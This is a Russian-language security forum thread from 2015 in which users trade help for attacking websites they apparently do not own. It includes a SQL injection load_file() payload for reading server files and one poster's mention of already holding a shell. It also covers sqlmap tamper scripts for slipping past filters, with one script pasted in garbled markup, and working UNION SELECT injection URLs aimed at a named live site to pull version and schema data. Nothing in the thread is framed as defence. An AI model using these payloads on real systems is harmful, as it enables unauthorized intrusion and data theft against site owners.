HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #541  
Старый 03.09.2015, 08:51
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
Провел на форуме:
54593

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
1. Удалось вытащить phpinfo.php, согласно которому установлено: операционка - LinuxRedhat, сервер - Apache/2.2.3 (CentOS), PHP Version 5.3.6, phpMyAdmin 2.11.11.3, mysql 5.1.58.
Собственно вопрос, что означает последний адрес: HTTP_X_FORWARDED_FOR- 95.141.31.xxx, HTTP_X_REAL_IP - 95.141.31.xxx, REMOTE_ADDR - 95.141.31.xxx, SERVER_ADDR - 62.76.47.XXX? Виртуалка?
Это твои ip, а сервер addr - адрес сервера.

Цитата:
Сообщение от None  
Может ли быть такое, что админки вообще нет (не сконфигурирована), а сайт заливается по ftp? Или искать другую админку (пока методом тыка нашел закрытые папки h**p://цель/code/, h**p://цель/cgi-bin/, с авторизацией h**p://цель/ webmail/src/login.php/, открытую h**p://цель/icons/).
может быть как угодно. может быть админка со скулей, может админка со стандартным паролем админ и пр.

Нужно сканировать, чтобы найти ее. сканером директории.

Цитата:
Сообщение от None  
4. В корне находятся (forbidden) /.htaccess, /.htpasswd, /.htconfig - может, вся соль там?)) Куды копать дальше?
линки, пароль и конфиг. Ничего интересного. Максимум, найдешь пару директории и хешированный пароль в DES(если есть права на запись.)

------------------------

Теперь у меня самого вопрос.

Каким образом можно прочитать чужие файлы на сервере? Через mysql я уже попытался...
 
Ответить с цитированием

  #542  
Старый 03.09.2015, 11:22
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от Muracha  

Это твои ip, а сервер addr - адрес сервера.
может быть как угодно. может быть админка со скулей, может админка со стандартным паролем админ и пр.
Нужно сканировать, чтобы найти ее. сканером директории.
линки, пароль и конфиг. Ничего интересного. Максимум, найдешь пару директории и хешированный пароль в DES(если есть права на запись.)
------------------------
Теперь у меня самого вопрос.
Каким образом можно прочитать чужие файлы на сервере? Через mysql я уже попытался...
union select 1,2,3,4,5,load_file('путьк чужёму вайлу на сервере'),6,7,8,9,0 -- Но я думаю тебя просто туда не пустят, не каждый свой файл можешь прочитать.
 
Ответить с цитированием

  #543  
Старый 03.09.2015, 12:27
Muracha
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
Провел на форуме:
54593

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  

union select 1,2,3,4,5,load_file('путьк чужёму вайлу на сервере'),6,7,8,9,0 -- Но я думаю тебя просто туда не пустят, не каждый свой файл можешь прочитать.
у меня есть шелл. есть доступ к записям файлов, есть доступ к БД phpmyadmin пользователя. дело даже не в sql ini..

Использовал статью https://xakep.ru/2013/11/16/read-file-in-mysql/ но как-то грустно.

То есть не сработало.
 
Ответить с цитированием

  #544  
Старый 04.09.2015, 12:22
hakwar
Новичок
Регистрация: 25.12.2010
Сообщений: 9
Провел на форуме:
3011

Репутация: 0
По умолчанию

Цитата:
Сообщение от XAMEHA  

Код:
...
Не пропускает....
 
Ответить с цитированием

  #545  
Старый 04.09.2015, 13:47
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
По умолчанию

Как в sqlmap заменить union на /*!12345uNIoN*/

--prefix=PREFIX Injection payload prefix string

--suffix=SUFFIX Injection payload suffix string

--tamper=TAMPER Use given script(s) for tampering injection data

Как заюзать?
 
Ответить с цитированием

  #546  
Старый 04.09.2015, 15:18
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
Провел на форуме:
132418

Репутация: 652


По умолчанию

Цитата:
Сообщение от DezMond™  

Как в sqlmap заменить union на /*!12345uNIoN*/
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
Как заюзать?
Тампер-скрипты посмотрите, должен быть такой в папке /tamper.
 
Ответить с цитированием

  #547  
Старый 05.09.2015, 00:45
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от YaBtr  

Тампер-скрипты посмотрите, должен быть такой в папке /tamper.
Я так понимаю скрипт называется unionalltounion

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]#!/usr/bin/env python

[/COLOR][COLOR="#DD0000"]"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

[/COLOR][COLOR="#0000BB"]from lib[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]core[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]enums import PRIORITY

__priority__
[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]PRIORITY[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]HIGHEST

def dependencies
[/COLOR][COLOR="#007700"]():
[/
COLOR][COLOR="#0000BB"]pass

def tamper
[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]payload[/COLOR][COLOR="#007700"], **[/COLOR][COLOR="#0000BB"]kwargs[/COLOR][COLOR="#007700"]):
[/
COLOR][COLOR="#DD0000"]"""
Replaces /*!12345uNioN*/ /*!12345AlL*/ /*!12345seLEcT*/ with /*!12345uNioN*/ /*!12345seLEcT*/

>>> tamper('-1 /*!12345uNioN*/ /*!12345AlL*/ /*!12345seLEcT*/')
'-1 /*!12345uNioN*/ /*!12345seLEcT*/'
"""

[/COLOR][COLOR="#007700"]return[/COLOR][COLOR="#0000BB"]payload[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UNION ALL SELECT"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/*!12345uNioN*/ /*!12345seLEcT*/"[/COLOR][COLOR="#007700"]) if[/COLOR][COLOR="#0000BB"]payload[/COLOR][COLOR="#007700"]else[/COLOR][COLOR="#0000BB"]payload[/COLOR][/COLOR
 
Ответить с цитированием

  #548  
Старый 11.09.2015, 10:46
gQd
Познающий
Регистрация: 13.01.2013
Сообщений: 93
Провел на форуме:
28937

Репутация: 0
По умолчанию

http://gmsy.ru/games/1'

Как можно раскрутить?
 
Ответить с цитированием

  #549  
Старый 11.09.2015, 10:51
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от gQd  

http://gmsy.ru/games/1
'
Как можно раскрутить?
попробуйте вектор без пробелов
 
Ответить с цитированием

  #550  
Старый 11.09.2015, 12:06
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197

Репутация: 25


По умолчанию

Цитата:
Сообщение от gQd  

http://gmsy.ru/games/1
'
Как можно раскрутить?
http://gmsy.ru/games/lineage-ii-freek'+union+select+1,2,3,4,@@version,6,7,8,9+--+

скобки вроди бы фильтруются

http://gmsy.ru/games/lineage-ii-fre...+from+information_schema.tables+limit+0,1+--+
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.